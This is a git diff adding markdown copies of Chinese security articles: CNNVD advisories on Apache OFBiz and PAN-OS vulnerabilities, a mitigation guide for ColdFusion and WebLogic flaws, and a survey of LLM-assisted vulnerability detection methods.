我们希望了解您对这篇文章的看法和感受。我们真诚地想知道您是否认为这篇文章为您带来了有价值的资讯和启示,是否有助于您的个人或职业发展。
如果您认为这篇文章对您非常有价值,并且希望获得更多的相关资讯和服务,我们愿意为您提供进一步的定制化服务。请通过填写我们提供的在线表单,与我们联系并提供您的邮箱地址或其他联系方式。我们将定期向您发送相关资讯和更新,以帮助您更好地了解我们的服务和文章内容。

                   
                               扫描二维码,参与调查

+ + +**END** + + + +点击下方,关注公众号 + +获取免费咨询和安全服务 + +![](https://mmbiz.qpic.cn/mmbiz_png/JqliagemfTA5OxIlGh6IbpxrTJHkcY5DZ4O80nevX4Ev7IHvjZfPZDDMxibSVWk4IdYfaYpuhBgz2iaWS5tzXZLJw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + + + +安全咨询/安全集成/安全运营 + +专业可信的信息安全应用服务商! + +http://www.jsgjxx.com + + + diff --git a/doc/CNNVD | 关于Apache OFBiz安全漏洞的通报.md b/doc/CNNVD | 关于Apache OFBiz安全漏洞的通报.md new file mode 100644 index 00000000..1ee3ea48 --- /dev/null +++ b/doc/CNNVD | 关于Apache OFBiz安全漏洞的通报.md @@ -0,0 +1,71 @@ +# CNNVD | 关于Apache OFBiz安全漏洞的通报 + 中国信息安全 2024-11-20 10:12 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MBicjiae1FlDHspS1icKI5DPchRAiabVUjGwSYgL2zre1AC5ZSd8VdOvFYQ/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "") + +**扫码订阅《中国信息安全》** + + +邮发代号 2-786 + +征订热线:010-82341063 + + + + + + +**漏洞情况** + +近日,国家信息安全漏洞库(CNNVD)收到关于Apache OFBiz安全漏洞(CNNVD-202411-2279、CVE-2024-47208)情况的报送。攻击者可以利用漏洞向目标发送恶意请求,通过服务端请求伪造的方式远程执行任意代码。Apache OFBiz 18.12.17以下版本受此漏洞影响。目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。 + +## 一漏洞介绍 + + +Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。漏洞源于程序对URL校验不严格,攻击者可通过构造恶意URL绕过校验并注入Groovy 表达式代码或触发服务器端请求伪造(SSRF)攻击,导致远程代码执行。 + +## 二危害影响 + + +Apache OFBiz 18.12.17以下版本受此漏洞影响。 + +## 三修复建议 + + +目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方下载链接如下: + +https://ofbiz.apache.org/download.html + +本通报由CNNVD技术支撑单位——北京神州绿盟科技有限公司、深信服科技股份有限公司、西安交大捷普网络科技有限公司、数字新时代(山东)数据科技服务有限公司、安恒愿景(成都)信息科技有限公司、网宿科技股份有限公司等技术支撑单位提供支持。 + +CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。 + +联系方式:cnnvd@itsec.gov.cn + +(来源:CNNVD) + + + +**分享网络安全知识 强化网络安全意识** + +**欢迎关注《中国信息安全》杂志官方抖音号** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2M2F0GT7xiboynjVmCL5sOibaNp9GaEQxpA1KBZ2HZgaxXibOHG8Uz5ItDQ/640?wx_fmt=jpeg&from=appmsg "") + + +**《中国信息安全》杂志倾力推荐** + +**“企业成长计划”** + + +**点击下图 了解详情** + + + +[](http://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664162643&idx=1&sn=fcc4f3a6047a0c2f4e4cc0181243ee18&chksm=8b5ee7aabc296ebc7c8c9b145f16e6a5cf8316143db3edce69f2a312214d50a00f65d775198d&scene=21#wechat_redirect) + + diff --git a/doc/CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报.md b/doc/CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报.md new file mode 100644 index 00000000..116df44b --- /dev/null +++ b/doc/CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报.md @@ -0,0 +1,69 @@ +# CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报 + 中国信息安全 2024-11-20 10:12 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MBicjiae1FlDHspS1icKI5DPchRAiabVUjGwSYgL2zre1AC5ZSd8VdOvFYQ/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2MfX7ibtlhTaY67PtD9e3t07YjgazE1ND8gGfMic9TdW0piaXVT39EO8JKA/640?wx_fmt=gif&from=appmsg "") + +**扫码订阅《中国信息安全》** + + +邮发代号 2-786 + +征订热线:010-82341063 + + + + +**漏洞情况** + +近日,国家信息安全漏洞库(CNNVD)收到关于Palo Alto Networks PAN-OS 安全漏洞(CNNVD-202411-2328、CVE-2024-0012)情况的报送。攻击者可以利用漏洞在未授权的情况下访问后台管理界面,进而获取管理员权限,控制目标设备。PAN-OS多个版本均受此漏洞影响。目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。 + +## 一漏洞介绍 + + +Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。Palo Alto Networks PAN-OS存在安全漏洞,该漏洞源于设备存在身份验证绕过问题,攻击者利用漏洞可以在未授权的情况下登录后台管理界面,进而获取管理员权限,控制目标设备。 + +## 二危害影响 + + +PAN-OS 10.2-10.2.12-h之前版本、PAN-OS 11.0-11.0.6-h之前版本、PAN-OS 11.1-11.1.5-h之前版本、PAN-OS 11.2-11.2.4-h1之前版本均受此漏洞影响。 + +## 三修复建议 + + +目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方参考链接: + +https://security.paloaltonetworks.com/CVE-2024-0012 + +本通报由CNNVD技术支撑单位——华为技术有限公司、奇安信网神信息技术(北京)股份有限公司、深圳市深信服信息安全有限公司、网宿科技股份有限公司、塞讯信息技术(上海)有限公司、杭州安恒信息技术股份有限公司、中孚安全技术有限公司、长扬科技(北京)股份有限公司、北京众安天下科技有限公司、上海云盾信息技术有限公司、广西网信信息技术有限公司等技术支撑单位提供支持。 + +CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。 + +联系方式:cnnvd@itsec.gov.cn + +(来源:CNNVD) + + + +**分享网络安全知识 强化网络安全意识** + +**欢迎关注《中国信息安全》杂志官方抖音号** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1brjUjbpg5yu2TSIxOZGKwVpP76gQo2M2F0GT7xiboynjVmCL5sOibaNp9GaEQxpA1KBZ2HZgaxXibOHG8Uz5ItDQ/640?wx_fmt=jpeg&from=appmsg "") + + +**《中国信息安全》杂志倾力推荐** + +**“企业成长计划”** + + +**点击下图 了解详情** + + + +[](http://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664162643&idx=1&sn=fcc4f3a6047a0c2f4e4cc0181243ee18&chksm=8b5ee7aabc296ebc7c8c9b145f16e6a5cf8316143db3edce69f2a312214d50a00f65d775198d&scene=21#wechat_redirect) + + diff --git a/doc/CNNVD关于Apache OFBiz安全漏洞的通报.md b/doc/CNNVD关于Apache OFBiz安全漏洞的通报.md new file mode 100644 index 00000000..7b157979 --- /dev/null +++ b/doc/CNNVD关于Apache OFBiz安全漏洞的通报.md @@ -0,0 +1,44 @@ +# CNNVD关于Apache OFBiz安全漏洞的通报 +原创 CNNVD CNNVD安全动态 2024-11-20 09:05 + +![](https://mmbiz.qpic.cn/mmbiz_gif/g1thw9Goocf2Ufz929a1thwAyKI8uIwUT7yfu4ibROBCthXslE23ia0ibWJVYlkxqulYy37zyiblBfrwib4m7erTkbQ/640?wx_fmt=gif&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/k5xJjBPo8ceEDyDtWwClGjzMFF89SzKxRwqsR5z89FRTn8YhflGDHd440FiafMOgcV0GYmiawnCH2GUGYcaciaG8g/640?&wx_fmt=gif "") + +**点击蓝字 关注我们** + +![](https://mmbiz.qpic.cn/mmbiz_gif/aqTr2WnSRI6o0t7BMQpMu5RC6OgKfSTia0iclOkC3ibiao2LBH88P7F9nDjxDzYq9Y9PicS0OlPseqmQqHfiaM4TVq1w/640?&wx_fmt=gif "") + + + + + +**漏洞情况** + +近日,国家信息安全漏洞库(CNNVD)收到关于Apache OFBiz安全漏洞(CNNVD-202411-2279、CVE-2024-47208)情况的报送。攻击者可以利用漏洞向目标发送恶意请求,通过服务端请求伪造的方式远程执行任意代码。Apache OFBiz 18.12.17以下版本受此漏洞影响。目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。 + +## 一漏洞介绍 + + +Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。漏洞源于程序对URL校验不严格,攻击者可通过构造恶意URL绕过校验并注入Groovy 表达式代码或触发服务器端请求伪造(SSRF)攻击,导致远程代码执行。 + +## 二危害影响 + + +Apache OFBiz 18.12.17以下版本受此漏洞影响。 + +## 三修复建议 + + +目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方下载链接如下: + +https://ofbiz.apache.org/download.html + +本通报由CNNVD技术支撑单位——北京神州绿盟科技有限公司、深信服科技股份有限公司、西安交大捷普网络科技有限公司、数字新时代(山东)数据科技服务有限公司、安恒愿景(成都)信息科技有限公司、网宿科技股份有限公司等技术支撑单位提供支持。 + +CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。联系方式: cnnvd@itsec.gov.cn + +![](https://mmbiz.qpic.cn/mmbiz_gif/tV4JDvMn6RMFN7ExSt7AEhx1DPNW68Bt8SXrAelC5L01auTNJkN19gJn8zP0hPAhSMHibfRNj70fV2aDD6u681Q/640?&wx_fmt=gif "") + + diff --git a/doc/CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报.md b/doc/CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报.md new file mode 100644 index 00000000..fabb3795 --- /dev/null +++ b/doc/CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报.md @@ -0,0 +1,44 @@ +# CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报 +原创 CNNVD CNNVD安全动态 2024-11-20 09:05 + +![](https://mmbiz.qpic.cn/mmbiz_gif/g1thw9Goocf2Ufz929a1thwAyKI8uIwUT7yfu4ibROBCthXslE23ia0ibWJVYlkxqulYy37zyiblBfrwib4m7erTkbQ/640?wx_fmt=gif&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/k5xJjBPo8ceEDyDtWwClGjzMFF89SzKxRwqsR5z89FRTn8YhflGDHd440FiafMOgcV0GYmiawnCH2GUGYcaciaG8g/640? "") + +**点击蓝字 关注我们** + +![](https://mmbiz.qpic.cn/mmbiz_gif/aqTr2WnSRI6o0t7BMQpMu5RC6OgKfSTia0iclOkC3ibiao2LBH88P7F9nDjxDzYq9Y9PicS0OlPseqmQqHfiaM4TVq1w/640? "") + + + + +**漏洞情况** + +近日,国家信息安全漏洞库(CNNVD)收到关于Palo Alto Networks PAN-OS 安全漏洞(CNNVD-202411-2328、CVE-2024-0012)情况的报送。攻击者可以利用漏洞在未授权的情况下访问后台管理界面,进而获取管理员权限,控制目标设备。PAN-OS多个版本均受此漏洞影响。目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。 + +## 一漏洞介绍 + + +Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。Palo Alto Networks PAN-OS存在安全漏洞,该漏洞源于设备存在身份验证绕过问题,攻击者利用漏洞可以在未授权的情况下登录后台管理界面,进而获取管理员权限,控制目标设备。 + +## 二危害影响 + + +PAN-OS 10.2-10.2.12-h之前版本、PAN-OS 11.0-11.0.6-h之前版本、PAN-OS 11.1-11.1.5-h之前版本、PAN-OS 11.2-11.2.4-h1之前版本均受此漏洞影响。 + +## 三修复建议 + + +目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方参考链接: + +https://security.paloaltonetworks.com/CVE-2024-0012 + +本通报由CNNVD技术支撑单位——华为技术有限公司、奇安信网神信息技术(北京)股份有限公司、深圳市深信服信息安全有限公司、网宿科技股份有限公司、塞讯信息技术(上海)有限公司、杭州安恒信息技术股份有限公司、中孚安全技术有限公司、长扬科技(北京)股份有限公司、北京众安天下科技有限公司、上海云盾信息技术有限公司、广西网信信息技术有限公司等技术支撑单位提供支持。 + +CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。联系方式: +cnnvd@itsec.gov.cn + +![](https://mmbiz.qpic.cn/mmbiz_gif/tV4JDvMn6RMFN7ExSt7AEhx1DPNW68Bt8SXrAelC5L01auTNJkN19gJn8zP0hPAhSMHibfRNj70fV2aDD6u681Q/640? "") + + diff --git a/doc/CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害.md b/doc/CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害.md new file mode 100644 index 00000000..262d3c5b --- /dev/null +++ b/doc/CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害.md @@ -0,0 +1,99 @@ +# CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害 + Ots安全 2024-11-20 10:39 + +![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTP0P2frZhbCB8pciakDdVnyClkv39nRGW0zCBSeEdu8QgDjBibhHck1ozA/640?wx_fmt=png&from=appmsg "") + +CVE-2024-20767- ColdFusion 路径遍历可能导致读取重要数据 + +CVE-2024-20767是 ColdFusion 版本 2023.6、2021.12 及更早版本中的一个漏洞。这些版本受到不当访问控制漏洞的影响,可能允许任意文件系统读取。攻击者可以利用此漏洞绕过安全措施,未经授权访问敏感文件,并执行任意文件系统写入。利用此问题不需要用户交互。该漏洞的 CVSS 评分很高,因此对易受此漏洞影响的资产构成重大风险。 + +根据Fofa搜索引擎,全球有超过 145,000 个使用ColdFusion 的公共应用程序 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPAOGL4iaXOmvDdcSwH43sIibiaEicz34BHaWVZkuz18IzQyKhaSDlPEdogg/640?wx_fmt=png&from=appmsg "") + +并且,其中一些人让管理面板保持可访问状态,而上面的错误可能会利用这一点,因为根本原因是管理功能端点 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPTNsCial3OM4Z9FXdrYqTS9K2yctzS0mONFrz8uVHN44zE3VcZcMpbcA/640?wx_fmt=png&from=appmsg "") + +攻击者可以轻松利用任何公开的漏洞,如以下示例 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPSvCrWQiaP2fnPiauYjfYGYfxEYicIjmu5hVWRcfB8YNkkXlWJoqiaTnwOQ/640?wx_fmt=png&from=appmsg "") + +转到安全部分,然后允许 IP 地址并添加仅允许使用管理面板的本地 IP,此操作将限制可以使用管理功能的人员,以避免泄露 uuid,这对于ColdFusion安全流程中的特权非常重要 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTP0XGttZ0dj7yqc7qGhOUnrVTG6ZNJ24wIy5OOydpsT4GS2dicFtuHIjA/640?wx_fmt=png&from=appmsg "") + +正如我们所看到的,应用更改后,我们现在无法利用目标,因为访问限制  + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPMAFnXdiaDQJab9yrUmJbctqKP7QxqzXngriakUo7WgpvKCLnhZlom78w/640?wx_fmt=png&from=appmsg "") + +CVE-2024-21216 – Weblogic 未经身份验证的 RCE + +CVE-2024-21216是 Oracle Fusion Middleware(组件:Core)的 Oracle WebLogic Server 产品中的一个漏洞。受影响的受支持版本包括 12.2.1.4.0 和 14.1.1.0.0。这个易于利用的漏洞允许未经身份验证的攻击者通过T3和IIOP获得网络访问权限,从而入侵 Oracle WebLogic Server。成功利用此漏洞可导致 Oracle WebLogic Server 被接管。CVSS 基本评分为 9.8,非常严重。 + +PoC 尚未发布,但为了避免WebLogic服务器被接管,如下图所示,Nmap 扫描附带了一个 Weblogic 版本 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPorKKMk0m9ygsYvCFnkCjdVf7r32qLXHcRwWlXpKRsUxwzNFYo3OWTQ/640?wx_fmt=png&from=appmsg "") + +要管理网络连接我们需要使用weblogic.security.net.ConnectionFilterImpl 来过滤对 T3 的访问 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPKKsltibfy3ibaGib57vafhfKxOxULV08px13U5Ykn4CP5E9Ah5oW4ABOQ/640?wx_fmt=png&from=appmsg "") + +通过根据环境应用以下网络规则,它将限制对公共连接的访问以访问T3协议,以避免受到攻击 + +127.0.0.1 * * allow t3 t3s # 允许从本地主机访问 T3/T3s + + * * allow t3 t3s # 允许从本地 IP 进行 T3/T3s 访问 + + * * allow t3 t3s # 允许来自特定受信任 IP 的 T3/T3s 访问 + +* * * 拒绝 t3 t3s # 拒绝所有其他 T3/T3s 访问 + +要禁用IIOP,请转到服务器,然后转到AdminServer(admin)配置 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTP2Lo1cHfBaMsecicWKqPaIfwuXRfRYC2DRdZBqvRl4Caf51kbFlia6Law/640?wx_fmt=png&from=appmsg "") + +然后,转到“协议”,选择“IIOP” ,然后取消选中“启用 IIOP”以禁用此协议 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPmiaBQN1YgLGSpl2FoWQJaq2yQad4IiaLBCGLBomclwCDVoS6MW0E5J3g/640?wx_fmt=png&from=appmsg "") + +然后通过运行./StopWeblogic.sh保存并重新启动 Weblogic,然后使用./StartWeblogic.sh重新启动它 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPzEOz1Pb753ghTu76MtN76HM0ECBQzLgicNlIcmuUIrnMVb29Poehkog/640?wx_fmt=png&from=appmsg "") + +再次运行 Nmap 扫描,结果显示握手失败,这是由于T3协议 的限制 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48taeEfwPfBRfibjX92PgMVbhTPsMpwGuBCZf6JicSsBQvZNqrNy3QRxaQnKnicJ6bCWC71Pl4jbaR88OrA/640?wx_fmt=png&from=appmsg "") + +**推荐** + +始终建议应用官方补丁。然而,在大型环境中,立即应用补丁可能不可行。在这篇博文中,我们的目标是手动限制漏洞风险,而不修补应用程序。请记住,这些缓解措施可能会限制访问并禁用应用程序中的某些功能 + +**参考** + +https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html + +https://docs.oracle.com/middleware/11119/wls/WLAPI/weblogic/security/net/ConnectionFilterImpl.html + + + +感谢您抽出 + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycNnFvFYVgXoExRy0gqCkqvrAghf8KPXnwQaYq77HMsjcVka7kPcBDQw/640?wx_fmt=gif "") + +. + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycd5KMTutPwNWA97H5MPISWXLTXp0ibK5LXCBAXX388gY0ibXhWOxoEKBA/640?wx_fmt=gif "") + +. + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycU99fZEhvngeeAhFOvhTibttSplYbBpeeLZGgZt41El4icmrBibojkvLNw/640?wx_fmt=gif "") + +来阅读本文 + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWge7Mibiad1tV0iaF8zSD5gzicbxDmfZCEL7vuOevN97CwUoUM5MLeKWibWlibSMwbpJ28lVg1yj1rQflyQ/640?wx_fmt=gif "") + +**点它,分享点赞在看都在这里** + diff --git a/doc/DataCon晚自习 | 浅谈大模型辅助漏洞挖掘.md b/doc/DataCon晚自习 | 浅谈大模型辅助漏洞挖掘.md new file mode 100644 index 00000000..091a2907 --- /dev/null +++ b/doc/DataCon晚自习 | 浅谈大模型辅助漏洞挖掘.md @@ -0,0 +1,469 @@ +# DataCon晚自习 | 浅谈大模型辅助漏洞挖掘 +eeuk DataCon大数据安全分析竞赛 2024-11-20 10:43 + +本文转载自“奇安信天工实验室” + +DataCon2024 +正在如火如荼地进行,本次竞赛漏洞分析赛道题目融入了大模型的背景,以探索大模型在漏洞挖掘工作中的利用,本篇文章将为大家讲述大模型辅助漏洞挖掘相关内容,参赛者必看哦。 + +**目** + +**录** + +一、前  言 + +二、函数级别漏洞检测 + +三、代码库级别漏洞检测 + +四、未来研究方向 + +五、总  结 + + +**一** + + +**前  言** + + +大语言模型(LLM)近期成为安全研究和竞赛中的热门话题,涵盖了大模型在安全领域的应用以及自身的安全性等方向,这一趋势为许多非大模型安全研究领域的研究者提供了了解和探索的机会。 + + +得益于强大的上下文理解与模式识别能力,大模型被认为具备从已知漏洞中学习特征并检测、修复未知漏洞的潜力。目前,大多数基于大模型的漏洞检测和修复方案集中在函数级别,只处理小范围的代码片段,不过也有少量研究开始探索代码库级别的问题。 + + +本次 DataCon 聚焦于真实漏洞环境,提供了和漏洞相关的完整程序代码,要求参赛者“结合大模型技术自动化识别出漏洞样例中存在的安全隐患”。为此,本文将从函数级别和代码库级别两个方面简要分析和梳理当前研究进展,并结合代码库级别漏洞检测的需求,探讨未来的研究方向。 + +**二** + + +**函数级别漏洞检测** + + +> 本节主要参考 Large Language Model for Vulnerability Detection and Repair: Literature Review and the Road Ahead,未注明来源的研究方法,可在该综述中查阅。 + + + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1PhLdJ3yiaNrkqTd8Z0uDb7OW2QrHzCibFupeEiaAp89XhU6RSGNqlZ40g/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:参考链接[1] + + +从提升大模型漏洞挖掘能力的角度,主要可以将当前研究分为三种方法:**微调**、**提示工程**和**检索增强生成(RAG)**。微调通过在漏洞数据上的定向训练来调整模型的参数;提示工程则以黑盒的方式,通过精心设计的 Prompt 来优化模型在具体应用场景中的输出效果;RAG 从数据库中检索相关知识并整合到 LLM 的上下文中,同样不需要修改 LLM 的参数。 + +**01** + +**微调** + + +一般的微调训练包含以下几个步骤:**数据准备** +、**模型设计** +、**模型训****练** +和**模型优化** +。根据不同研究方法主要针对的训练阶段,可以划分为以下几个类别: +- 以数据为中心的创新(数据准备) + +漏洞数据集通常存在标签不平衡和标签不正确的问题。一些研究通过数据采样、伪标签生成以及反事实数据生成等方法,尝试针对这些问题提出解决方案; + +- 结合程序分析方法(数据准备) + +一些研究将程序分析工具的结果引入模型的预训练或微调阶段,以帮助 LLM 更好地理解代码逻辑和数据依赖关系。例如: + +- 可以提取抽象语法树(AST)和程序依赖图(PDG)来进行语句级控制依赖和数据依赖的预训练; + +- 利用程序切片提取控制和数据依赖信息,将控制流图(CFG)分解为执行路径,为模型提供漏洞检测的支持。 + +- 结合其他深度学习模型(模型设计) + +通过 Bi-LSTM (双向长短期记忆网络)处理分段后的代码输入克服了 LLM 的长度限制;亦或是通过 GNN (图神经网络)提取代码的图结构特征来补充 LLM 对代码结构的理解; + +- 针对特定领域进行训练(模型训练) + +通过在特定编程语言和特定漏洞类型的数据上进行预训练,使用如掩码语言模型、对比学习、程序依赖预测和漏洞语句标注等不同的预训练目标,可以增强模型对特定编程语言、特定漏洞模式以及复杂代码依赖关系的理解能力; + +- 因果学习(训练优化) + +通过识别和剔除那些与漏洞标签存在虚假相关的非稳健特征,进而使用因果推理算法来提升模型的因果推理能力。 + +其中,相比于其他方法更像是在解决一些大模型的通病,“结合程序分析方法”以及“针对特定领域进行训练”两类方法,则更依赖研究者对程序分析和漏洞挖掘领域的深入理解。限于时间原因笔者没能深入了解相关方法的研究细节,感兴趣的读者建议阅读相关论文。 + +**02** + +**微调:如何训练自己的模型** + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1U6GCibkjeSAXT0bBrvO0SPTTnhQBQicN4kghpX2eUiaFkzAunXiafCbGhg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:When LLMs Meet Cybersecurity: A Systematic Literature Review + + +那如果我们想要微调自己的大模型,有哪些需要关注的问题呢?首先是选择使用的研究方法:根据数据规模、数据是否标记、模型选择和预算,可以划分为如图所示的模型训练方法。 + + +**CPT(持续预训练)** +使用大量未标记的特定领域数据对已经预训练的大模型进行进一步训练;**SFT (有监督微调)** +更专注于增强特定任务的性能,使用有标签的数据进行训练。**FULL(全参数微调)** +细化所有参数,需要大量的计算能力和时间;相比之下,**PEFT(参数高效微调)** +通过仅微调少量模型参数大大降低了计算成本,常见的 LoRA (Low Rank Approximation)就属于 PEFT 方法。在针对于漏洞检测的领域,许多研究采用了 SFT 和 PEFT。 + + +此外,在一个不考虑特殊优化方法的微调过程中,还要涉及模型选择和数据集选择: + + +- **模型选择** + + + +![](https://mmbiz.qpic.cn/mmbiz_png/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf17kZC6ge2GtXatw4dHVMOkIea9cYqfRgia7WOgiaeW5bicTxDD7E3rAKHw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:参考链接[1] + + +上图统计漏洞挖掘领域中大模型的使用情况,可以看出 CodeBERT 和 ChatGPT 占据了最主要的部分。CodeBERT 是一种针对编程语言的预训练模型,结合了自然语言处理和编程语言理解能力。近期也有研究人员指出,Claude 3 凭借其超大的上下文窗口,整体表现优于 ChatGPT。 + + +- **数据集选择** + + + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/9EP6QFMcTmTPnokZZ8YNRXaUloc6lVf1AMIZJQ8gIs16pESVDWo7ibnScNRdGRuNueC3CAlS83RsoVgzo5Ddjxw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片来源:Vulnerability Detection with Code Language Models: How Far Are We? + + +早期研究通常使用 Juliet 和 SARD 等合成数据集来训练模型。后来,一系列基准测试开始从现实世界的开源软件存储库中收集漏洞。然而,现实漏洞数据集存在以下问题:自动标记数据集成本低但粒度过粗,且正确率较低;而手动标记结果虽然可靠,但需要大量的人工成本。 + + +ICSE 2025 上一项工作 [PrimeVul]() + 对这些常用的数据集进行了评估,揭示了现有漏洞数据集在正确率上的不足(如图所示),并在 Github 上公开了[新的数据集]() +。 + +**03** + +**提示工程** + + +另一类优化方法是提示工程,其关键在于设计有效的提示,引导 LLM 在未经专门训练的情况下执行漏洞检测任务。这种方法通常需要依赖大量实验和启发式技巧。根据提示词的交互次数,可以将提示工程分为**零次提示** +和**少次提示** +两种类型: +- 零次提示(Zero-shot Prompting) + +一方面,广为人知的 Prompt 技巧(如**任务描述、角色描述、思维链提示** +等)已被证明能够帮助模型更好地理解和执行特定任务。另一方面,同时提供与程序和漏洞相关的额外信息(例如漏洞类型描述等),也有助于模型更精准地提取程序中的漏洞特征; + +- 少次提示(Few-shot Prompting) + +少次提示的目标是提供一组高质量的示例,每个示例包含目标任务的输入和期望输出,从而进一步提高模型的准确性。例如,在要求模型分析目标函数之前,向其提供相同漏洞类型的漏洞函数作为示例,以帮助模型更好地理解该类型的漏洞。 + +**04** + +**检索增强生成** + + 